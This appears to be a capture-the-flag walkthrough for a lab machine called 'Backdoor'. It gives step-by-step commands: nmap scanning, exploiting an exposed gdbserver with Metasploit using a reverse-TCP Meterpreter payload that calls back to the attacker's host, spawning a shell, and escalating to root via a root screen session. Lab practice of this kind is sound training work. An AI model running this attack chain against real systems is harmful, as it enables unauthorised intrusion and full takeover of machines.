Backdoor

Let's start with nmap

nmap -sC -sV -p- targetIP

-p- means scan all 65535 ports

We find port 1337 open.

port 1337 is used for gdb server

https://sourceware.org/gdb/onlinedocs/gdb/Server.html

We found a vulnerability for this :

https://www.exploit-db.com/exploits/50539

Let's load metasploit using:

msfconsole

search gdbserver

use exploit/multi/gdb/gdb_server_exec

show options

We need to set RHOSTS (remote host) with the IP of the target machine

set RHOSTS 10.129.96.68

RPORT (remote port) should be port 1337:

set RPORT 1337

We need to set LHOST (local host) with the IP of our machine. If you don't know the IP of your machine, type ifconfig

set LHOST 10.10.14.21

We also need to set the payload. By default it is linux/x86/meterpreter/reverse_tcp

we need to change it to linux/x64/meterpreter/reverse_tcp

set payload linux/x64/meterpreter/reverse_tcp

We also need to change target ID. By default it is set as target ID 0 for x86 (32-bit)

We need to change it to target ID 1 for x86_64 (64-bit)

set target 1

Now let's check again that we configured it properly:

show options

Let's run the exploit

exploit

shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

whoami

ls

cat user.txt

We got the user flag!

Let's try privilege escalation with the usual

sudo -l

It is asking for a password and we don't have it:

Now let's try:

export TERM=xterm

Now type:

/usr/bin/screen -x root/root

we are now root!

ls

cat root.txt

We got the root flag!

Congratulations!